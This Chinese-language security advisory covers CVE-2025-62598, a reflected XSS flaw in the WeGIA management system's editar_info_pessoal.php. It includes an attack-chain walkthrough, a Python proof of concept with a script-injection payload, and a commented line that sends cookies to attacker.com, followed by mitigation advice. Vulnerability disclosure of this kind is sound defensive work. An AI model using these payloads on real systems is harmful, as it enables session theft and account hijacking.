CVE-2025-62598：WeGIA editar_info_pessoal.php 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62598

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WeGIA（开源机构Web管理系统）

漏洞概述

CVE-2025-62598 是 WeGIA 开源机构Web管理系统中存在的一个反射型跨站脚本（Reflected XSS）漏洞。WeGIA 是一款专注于葡萄牙语用户的开源Web管理平台，广泛应用于各类机构的日常管理工作中。该漏洞存在于系统的 editar_info_pessoal.php 端点中，具体位于 pessoa 模块下的个人信息编辑功能页面。

根据漏洞描述，在 WeGIA 3.5.1 版本之前，editar_info_pessoal.php 端点在处理用户请求时，未对 action 参数进行充分的输入验证和输出编码，导致攻击者可以通过精心构造的恶意脚本注入到该参数中。当受害者点击包含恶意链接的URL时，注入的脚本将在受害者的浏览器上下文中执行，从而实现窃取用户会话、劫持账户、窃取敏感信息或执行其他恶意操作的目的。

该漏洞的 CVSS 3.1 评分为 6.1，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需特权（PR:N），但需要用户交互（UI:R）。由于漏洞具有作用域改变（S:C）的特点，攻击成功后影响范围可能超出受感染组件本身。该漏洞已由 GitHub 安全顾问团队发现并报告，WeGIA 维护团队在 3.5.1 版本中修复了此问题。

技术细节

该漏洞的根源在于 editar_info_pessoal.php 端点在处理 GET 请求中的 action 参数时，未对该参数进行适当的输入过滤和输出编码。具体而言，当用户访问如下形式的 URL 时：

GET /WeGIA/html/pessoa/editar_info_pessoal.php?action=1

服务器端脚本将 action 参数的值直接嵌入到返回的 HTML 页面中，而没有使用 HTML 实体编码或其他安全转义机制。攻击者可以利用这一点，通过在 action 参数中注入恶意 JavaScript 代码（如 <script>alert(document.cookie)</script> 或更复杂的 payload），使得这些代码被服务器原样返回并在受害者的浏览器中执行。

由于这是反射型 XSS 漏洞，恶意代码不会持久化存储在服务器上，而是需要通过社会工程学手段诱导受害者点击特制的链接。一旦受害者点击，恶意脚本将在其浏览器上下文中执行，攻击者可以：1）窃取用户的会话 Cookie 和身份验证令牌；2）劫持用户账户，执行未授权操作；3）修改页面内容进行钓鱼攻击；4）利用浏览器漏洞进一步渗透用户系统。

修复方案是在服务端对 action 参数进行严格的输入验证（白名单方式，仅允许预定义的合法值），并在输出到 HTML 页面时使用适当的编码函数（如 htmlspecialchars()）。WeGIA 3.5.1 版本已实施这些修复措施。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统运行 WeGIA 3.5.1 之前的版本，并定位到 editar_info_pessoal.php 端点。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意 JavaScript 代码的URL，通过 action 参数注入 payload，例如：/WeGIA/html/pessoa/editar_info_pessoal.php?action=1"><script>...</script>。

STEP 3

步骤3：诱导受害者点击

攻击者通过钓鱼邮件、即时消息或其他社会工程学手段，诱导已登录的 WeGIA 用户点击恶意链接。

STEP 4

步骤4：恶意脚本执行

受害者点击链接后，服务器将未经编码的 action 参数值直接返回到 HTML 响应中，浏览器解析并执行注入的恶意脚本。

STEP 5

步骤5：数据窃取与权限提升

恶意脚本在受害者浏览器上下文中执行，窃取会话 Cookie、身份验证令牌或执行其他未授权操作，攻击者可借此劫持用户账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62598 PoC - WeGIA Reflected XSS
# Vulnerability: Reflected XSS in editar_info_pessoal.php via 'action' parameter
# Affected versions: WeGIA < 3.5.1
# Patched in: WeGIA 3.5.1

import requests

TARGET_URL = "http://target-host/WeGIA/html/pessoa/editar_info_pessoal.php"

# Malicious payload injected into the 'action' parameter
# This payload will be reflected in the HTML response without sanitization
PAYLOAD = '1"><script>alert(document.cookie)</script>'

# Craft the malicious URL
malicious_url = f"{TARGET_URL}?action={PAYLOAD}"

print(f"[*] Malicious URL: {malicious_url}")
print("[*] Send this URL to the victim to trigger the XSS attack.")

# Optional: Verify the vulnerability by sending the request directly
response = requests.get(malicious_url)
if PAYLOAD in response.text:
    print("[+] Target is vulnerable! Payload reflected in response.")
else:
    print("[-] Payload not found in response.")

# More sophisticated payload for cookie exfiltration
# COOKIE_STEALER_PAYLOAD = '1"><script>document.location="http://attacker.com/steal?c="+document.cookie</script>'
# malicious_steal_url = f"{TARGET_URL}?action={COOKIE_STEALER_PAYLOAD}"

影响范围

WeGIA < 3.5.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）通过 Web 应用防火墙（WAF）规则阻止包含可疑脚本标签（如 <script>、onerror、onload 等）的请求；2）在 HTTP 响应头中添加 Content-Security-Policy，限制内联脚本执行；3）为所有会话 Cookie 设置 HttpOnly 和 Secure 标志，降低 XSS 攻击的影响；4）对 editar_info_pessoal.php 端点的访问进行限制，仅允许可信用户访问；5）加强用户安全意识培训，警惕点击来历不明的链接。